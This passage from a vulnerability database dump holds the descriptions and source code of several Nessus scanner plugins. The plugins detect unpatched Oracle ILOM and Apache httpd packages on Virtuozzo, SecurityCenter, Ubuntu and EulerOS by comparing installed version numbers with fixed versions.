\"CVE-2017-10265\",\n \"CVE-2017-10275\",\n \"CVE-2017-3588\"\n );\n script_bugtraq_id(\n 93150,\n 94454,\n 101442,\n 101445,\n 101426,\n 101431,\n 101437,\n 101435\n );\n\n script_name(english:\"Oracle Integrated Lights Out Manager (ILOM) < 3.2.6 Multiple Vulnerabilities (uncredentialed check)\");\n script_summary(english:\"Checks DCNM version number\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A network management system installed on the remote host is affected\nby multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the version of Oracle\nIntegrated Lights Out Manager (ILOM) is affected by multiple vulnerabilities\nas described in the advisory.\");\n # http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html \n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1e07fa0e\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Oracle Integrated Lights Out Manager (ILOM) 3.2.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:sun:embedded_lights_out_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:integrated_lights_out_manager_firmware\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"oracle_ilom_web_detect.nasl\");\n script_require_keys(\"installed_sw/ilom\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nget_install_count(app_name:\"ilom\", exit_if_zero:TRUE);\n\nport = get_http_port(default:443);\napp = \"Oracle ILOM\";\n\ninstall = get_single_install(\n app_name : \"ilom\",\n port : port,\n exit_if_unknown_ver : TRUE\n );\nversion = install[\"version\"];\npath = install[\"path\"];\nurl = build_url(port:port, qs:path);\n\nfix = \"3.2.6\";\n\nif (ver_compare(ver:version, fix:fix) == -1)\n{\n report =\n '\\n URL : ' + url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, url, version);\n\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:31:44", "bulletinFamily": "scanner", "description": "An update for httpd is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.\n\nSecurity Fix(es) :\n\n* It was discovered that the mod_session_crypto module of httpd did not use any mechanisms to verify integrity of the encrypted session data stored in the user's browser. A remote attacker could use this flaw to decrypt and modify session data using a padding oracle attack.\n(CVE-2016-0736)\n\n* It was discovered that the mod_auth_digest module of httpd did not properly check for memory allocation failures. A remote attacker could use this flaw to cause httpd child processes to repeatedly crash if the server used HTTP digest authentication. (CVE-2016-2161)\n\n* It was discovered that the HTTP parser in httpd incorrectly allowed certain characters not permitted by the HTTP protocol specification to appear unencoded in HTTP request headers. If httpd was used in conjunction with a proxy or backend server that interpreted those characters differently, a remote attacker could possibly use this flaw to inject data into HTTP responses, resulting in proxy cache poisoning. (CVE-2016-8743)\n\nNote: The fix for the CVE-2016-8743 issue causes httpd to return '400 Bad Request' error to HTTP clients which do not strictly follow HTTP protocol specification. A newly introduced configuration directive 'HttpProtocolOptions Unsafe' can be used to re-enable the old less strict parsing. However, such setting also re-introduces the CVE-2016-8743 issue.\n\nBug Fix(es) :\n\n* When waking up child processes during a graceful restart, the httpd parent process could attempt to open more connections than necessary if a large number of child processes had been active prior to the restart. Consequently, a graceful restart could take a long time to complete. With this update, httpd has been fixed to limit the number of connections opened during a graceful restart to the number of active children, and the described problem no longer occurs.\n(BZ#1420002)\n\n* Previously, httpd running in a container returned the 500 HTTP status code (Internal Server Error) when a connection to a WebSocket server was closed. As a consequence, the httpd server failed to deliver the correct HTTP status and data to a client. With this update, httpd correctly handles all proxied requests to the WebSocket server, and the described problem no longer occurs. (BZ#1429947)\n\n* In a configuration using LDAP authentication with the mod_authnz_ldap module, the name set using the AuthLDAPBindDN directive was not correctly used to bind to the LDAP server for all queries. Consequently, authorization attempts failed. The LDAP modules have been fixed to ensure the configured name is correctly bound for LDAP queries, and authorization using LDAP no longer fails.\n(BZ#1420047)\n\nNote that Tenable Network Security has attempted to extract the preceding description block directly from the corresponding Red Hat security advisory. Virtuozzo provides no description for VZLSA advisories. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2019-02-19T00:00:00", "id": "VIRTUOZZO_VZLSA-2017-0906.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=101445", "published": "2017-07-13T00:00:00", "title": "Virtuozzo 7 : httpd / httpd-devel / httpd-manual / httpd-tools / etc (VZLSA-2017-0906)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101445);\n script_version(\"1.48\");\n script_cvs_date(\"Date: 2019/02/19 9:39:25\");\n\n script_cve_id(\n \"CVE-2016-0736\",\n \"CVE-2016-2161\",\n \"CVE-2016-8743\"\n );\n\n script_name(english:\"Virtuozzo 7 : httpd / httpd-devel / httpd-manual / httpd-tools / etc (VZLSA-2017-0906)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update for httpd is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe httpd packages provide the Apache HTTP Server, a powerful,\nefficient, and extensible web server.\n\nSecurity Fix(es) :\n\n* It was discovered that the mod_session_crypto module of httpd did\nnot use any mechanisms to verify integrity of the encrypted session\ndata stored in the user's browser. A remote attacker could use this\nflaw to decrypt and modify session data using a padding oracle attack.\n(CVE-2016-0736)\n\n* It was discovered that the mod_auth_digest module of httpd did not\nproperly check for memory allocation failures. A remote attacker could\nuse this flaw to cause httpd child processes to repeatedly crash if\nthe server used HTTP digest authentication. (CVE-2016-2161)\n\n* It was discovered that the HTTP parser in httpd incorrectly allowed\ncertain characters not permitted by the HTTP protocol specification to\nappear unencoded in HTTP request headers. If httpd was used in\nconjunction with a proxy or backend server that interpreted those\ncharacters differently, a remote attacker could possibly use this flaw\nto inject data into HTTP responses, resulting in proxy cache\npoisoning. (CVE-2016-8743)\n\nNote: The fix for the CVE-2016-8743 issue causes httpd to return '400\nBad Request' error to HTTP clients which do not strictly follow HTTP\nprotocol specification. A newly introduced configuration directive\n'HttpProtocolOptions Unsafe' can be used to re-enable the old less\nstrict parsing. However, such setting also re-introduces the\nCVE-2016-8743 issue.\n\nBug Fix(es) :\n\n* When waking up child processes during a graceful restart, the httpd\nparent process could attempt to open more connections than necessary\nif a large number of child processes had been active prior to the\nrestart. Consequently, a graceful restart could take a long time to\ncomplete. With this update, httpd has been fixed to limit the number\nof connections opened during a graceful restart to the number of\nactive children, and the described problem no longer occurs.\n(BZ#1420002)\n\n* Previously, httpd running in a container returned the 500 HTTP\nstatus code (Internal Server Error) when a connection to a WebSocket\nserver was closed. As a consequence, the httpd server failed to\ndeliver the correct HTTP status and data to a client. With this\nupdate, httpd correctly handles all proxied requests to the WebSocket\nserver, and the described problem no longer occurs. (BZ#1429947)\n\n* In a configuration using LDAP authentication with the\nmod_authnz_ldap module, the name set using the AuthLDAPBindDN\ndirective was not correctly used to bind to the LDAP server for all\nqueries. Consequently, authorization attempts failed. The LDAP modules\nhave been fixed to ensure the configured name is correctly bound for\nLDAP queries, and authorization using LDAP no longer fails.\n(BZ#1420047)\n\nNote that Tenable Network Security has attempted to extract the\npreceding description block directly from the corresponding Red Hat\nsecurity advisory. Virtuozzo provides no description for VZLSA\nadvisories. Tenable has attempted to automatically clean and format\nit as much as possible without introducing additional issues.\");\n # http://repo.virtuozzo.com/vzlinux/announcements/json/VZLSA-2017-0906.json\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?60d35048\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2017-0906\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected httpd / httpd-devel / httpd-manual / httpd-tools / etc package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:mod_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:mod_proxy_html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:mod_session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 7.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nflag = 0;\n\npkgs = [\"httpd-2.4.6-45.vl7.4\",\n \"httpd-devel-2.4.6-45.vl7.4\",\n \"httpd-manual-2.4.6-45.vl7.4\",\n \"httpd-tools-2.4.6-45.vl7.4\",\n \"mod_ldap-2.4.6-45.vl7.4\",\n \"mod_proxy_html-2.4.6-45.vl7.4\",\n \"mod_session-2.4.6-45.vl7.4\",\n \"mod_ssl-2.4.6-45.vl7.4\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"Virtuozzo-7\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / httpd-tools / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-02-21T01:31:32", "bulletinFamily": "scanner", "description": "The Tenable SecurityCenter application installed on the remote host is missing a security patch. It is, therefore, affected by multiple vulnerabilities in the bundled version of Apache :\n\n - A flaw exists in the mod_session_crypto module due to encryption for data and cookies using the configured ciphers with possibly either CBC or ECB modes of operation (AES256-CBC by default). An unauthenticated, remote attacker can exploit this, via a padding oracle attack, to decrypt information without knowledge of the encryption key, resulting in the disclosure of potentially sensitive information. (CVE-2016-0736)\n\n - A denial of service vulnerability exists in the mod_auth_digest module during client entry allocation.\n An unauthenticated, remote attacker can exploit this, via specially crafted input, to exhaust shared memory resources, resulting in a server crash. (CVE-2016-2161)\n\n - The Apache HTTP Server is affected by a man-in-the-middle vulnerability known as 'httpoxy' due to a failure to properly resolve namespace conflicts in accordance with RFC 3875 section 4.1.18. The HTTP_PROXY environment variable is set based on untrusted user data in the 'Proxy' header of HTTP requests. The HTTP_PROXY environment variable is used by some web client libraries to specify a remote proxy server. An unauthenticated, remote attacker can exploit this, via a crafted 'Proxy' header in an HTTP request, to redirect an application's internal HTTP traffic to an arbitrary proxy server where it may be observed or manipulated.\n (CVE-2016-5387)\n\n - A denial of service vulnerability exists in the mod_http2 module due to improper handling of the LimitRequestFields directive. An unauthenticated, remote attacker can exploit this, via specially crafted CONTINUATION frames in an HTTP/2 request, to inject unlimited request headers into the server, resulting in the exhaustion of memory resources. (CVE-2016-8740)\n\n - A flaw exists due to improper handling of whitespace patterns in user-agent headers. An unauthenticated, remote attacker can exploit this, via a specially crafted user-agent header, to cause the program to incorrectly process sequences of requests, resulting in interpreting responses incorrectly, polluting the cache, or disclosing the content from one request to a second downstream user-agent. (CVE-2016-8743)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "modified": "2018-12-14T00:00:00", "id": "SECURITYCENTER_APACHE_2_4_25.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=101044", "published": "2017-06-26T00:00:00", "title": "Tenable SecurityCenter Apache 2.4.x < 2.4.25 Multiple Vulnerabilities (TNS-2017-04) (httpoxy)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101044);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/12/14 13:41:21\");\n\n script_cve_id(\n \"CVE-2016-0736\",\n \"CVE-2016-2161\",\n \"CVE-2016-5387\",\n \"CVE-2016-8740\",\n \"CVE-2016-8743\"\n );\n script_bugtraq_id(\n 91816,\n 94650,\n 95076,\n 95077,\n 95078\n );\n script_xref(name:\"CERT\", value:\"797896\");\n script_xref(name:\"EDB-ID\", value:\"40961\");\n\n script_name(english:\"Tenable SecurityCenter Apache 2.4.x < 2.4.25 Multiple Vulnerabilities (TNS-2017-04) (httpoxy)\");\n script_summary(english:\"Checks the version of Apache in SecurityCenter.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Tenable SecurityCenter application on the remote host contains a\nweb server that is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Tenable SecurityCenter application installed on the remote host\nis missing a security patch. It is, therefore, affected by multiple\nvulnerabilities in the bundled version of Apache :\n\n - A flaw exists in the mod_session_crypto module due to\n encryption for data and cookies using the configured\n ciphers with possibly either CBC or ECB modes of\n operation (AES256-CBC by default). An unauthenticated,\n remote attacker can exploit this, via a padding oracle\n attack, to decrypt information without knowledge of the\n encryption key, resulting in the disclosure of\n potentially sensitive information. (CVE-2016-0736)\n\n - A denial of service vulnerability exists in the\n mod_auth_digest module during client entry allocation.\n An unauthenticated, remote attacker can exploit this,\n via specially crafted input, to exhaust shared memory\n resources, resulting in a server crash. (CVE-2016-2161)\n\n - The Apache HTTP Server is affected by a\n man-in-the-middle vulnerability known as 'httpoxy' due\n to a failure to properly resolve namespace conflicts in\n accordance with RFC 3875 section 4.1.18. The HTTP_PROXY\n environment variable is set based on untrusted user data\n in the 'Proxy' header of HTTP requests. The HTTP_PROXY\n environment variable is used by some web client\n libraries to specify a remote proxy server. An\n unauthenticated, remote attacker can exploit this, via a\n crafted 'Proxy' header in an HTTP request, to redirect\n an application's internal HTTP traffic to an arbitrary\n proxy server where it may be observed or manipulated.\n (CVE-2016-5387)\n\n - A denial of service vulnerability exists in the\n mod_http2 module due to improper handling of the\n LimitRequestFields directive. An unauthenticated, remote\n attacker can exploit this, via specially crafted\n CONTINUATION frames in an HTTP/2 request, to inject\n unlimited request headers into the server, resulting in\n the exhaustion of memory resources. (CVE-2016-8740)\n\n - A flaw exists due to improper handling of whitespace\n patterns in user-agent headers. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted user-agent header, to cause the program to\n incorrectly process sequences of requests, resulting in\n interpreting responses incorrectly, polluting the cache,\n or disclosing the content from one request to a second\n downstream user-agent. (CVE-2016-8743)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/tns-2017-04\");\n script_set_attribute(attribute:\"see_also\", value:\"https://static.tenable.com/prod_docs/upgrade_security_center.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://httpd.apache.org/security/vulnerabilities_24.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Tenable SecurityCenter version 5.4.3 or later.\nAlternatively, contact the vendor for a patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"manual\");\n script_set_attribute(attribute:'cvss_score_rationale', value:\"Score based on analysis of the vendor advisory.\");\n \n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:tenable:securitycenter\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"securitycenter_installed.nbin\", \"securitycenter_detect.nbin\");\n script_require_ports(\"Host/SecurityCenter/Version\", \"installed_sw/SecurityCenter\", \"Host/SecurityCenter/support/httpd/version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\napp = \"Apache (within SecurityCenter)\";\nfix = \"2.4.25\";\n\nsc_ver = get_kb_item(\"Host/SecurityCenter/Version\");\nport = 0;\nif(empty_or_null(sc_ver))\n{\n port = 443;\n install = get_single_install(app_name:\"SecurityCenter\", combined:TRUE, exit_if_unknown_ver:TRUE);\n sc_ver = install[\"version\"];\n}\nif (empty_or_null(sc_ver)) audit(AUDIT_NOT_INST, \"SecurityCenter\");\n\nversion = get_kb_item(\"Host/SecurityCenter/support/httpd/version\");\nif (empty_or_null(version)) audit(AUDIT_UNKNOWN_APP_VER, app);\n\nif (ver_compare(ver:version, minver:\"2.3\", fix:fix, strict:FALSE) < 0)\n{\n report =\n '\\n SecurityCenter version : ' + sc_ver +\n '\\n SecurityCenter Apache version : ' + version +\n '\\n Fixed Apache version : ' + fix +\n '\\n';\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, app, version);\n", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:30:49", "bulletinFamily": "scanner", "description": "It was discovered that the Apache mod_session_crypto module was encrypting data and cookies using either CBC or ECB modes. A remote attacker could possibly use this issue to perform padding oracle attacks. (CVE-2016-0736)\n\nMaksim Malyutin discovered that the Apache mod_auth_digest module incorrectly handled malicious input. A remote attacker could possibly use this issue to cause Apache to crash, resulting in a denial of service. (CVE-2016-2161)\n\nDavid Dennerline and Regis Leroy discovered that the Apache HTTP Server incorrectly handled unusual whitespace when parsing requests, contrary to specifications. When being used in combination with a proxy or backend server, a remote attacker could possibly use this issue to perform an injection attack and pollute cache. This update may introduce compatibility issues with clients that do not strictly follow HTTP protocol specifications. A new configuration option 'HttpProtocolOptions Unsafe' can be used to revert to the previous unsafe behaviour in problematic environments. (CVE-2016-8743).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-12-01T00:00:00", "id": "UBUNTU_USN-3279-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=100098", "published": "2017-05-10T00:00:00", "title": "Ubuntu 14.04 LTS / 16.04 LTS / 16.10 : apache2 vulnerabilities (USN-3279-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3279-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100098);\n script_version(\"3.7\");\n script_cvs_date(\"Date: 2018/12/01 15:12:41\");\n\n script_cve_id(\"CVE-2016-0736\", \"CVE-2016-2161\", \"CVE-2016-8743\");\n script_xref(name:\"USN\", value:\"3279-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS / 16.04 LTS / 16.10 : apache2 vulnerabilities (USN-3279-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the Apache mod_session_crypto module was\nencrypting data and cookies using either CBC or ECB modes. A remote\nattacker could possibly use this issue to perform padding oracle\nattacks. (CVE-2016-0736)\n\nMaksim Malyutin discovered that the Apache mod_auth_digest module\nincorrectly handled malicious input. A remote attacker could possibly\nuse this issue to cause Apache to crash, resulting in a denial of\nservice. (CVE-2016-2161)\n\nDavid Dennerline and Regis Leroy discovered that the Apache HTTP\nServer incorrectly handled unusual whitespace when parsing requests,\ncontrary to specifications. When being used in combination with a\nproxy or backend server, a remote attacker could possibly use this\nissue to perform an injection attack and pollute cache. This update\nmay introduce compatibility issues with clients that do not strictly\nfollow HTTP protocol specifications. A new configuration option\n'HttpProtocolOptions Unsafe' can be used to revert to the previous\nunsafe behaviour in problematic environments. (CVE-2016-8743).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3279-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache2-bin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2018 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(14\\.04|16\\.04|16\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04 / 16.04 / 16.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"apache2-bin\", pkgver:\"2.4.7-1ubuntu4.14\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"apache2-bin\", pkgver:\"2.4.18-2ubuntu3.2\")) flag++;\nif (ubuntu_check(osver:\"16.10\", pkgname:\"apache2-bin\", pkgver:\"2.4.18-2ubuntu4.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2-bin\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-02-21T01:30:38", "bulletinFamily": "scanner", "description": "According to the versions of the httpd packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - It was discovered that the mod_session_crypto module of httpd did not use any mechanisms to verify integrity of the encrypted session data stored in the user's browser. A remote attacker could use this flaw to decrypt and modify session data using a padding oracle attack. (CVE-2016-0736)\n\n - It was discovered that the mod_auth_digest module of httpd did not properly check for memory allocation failures. A remote attacker could use this flaw to cause httpd child processes to repeatedly crash if the server used HTTP digest authentication. (CVE-2016-2161)\n\n - 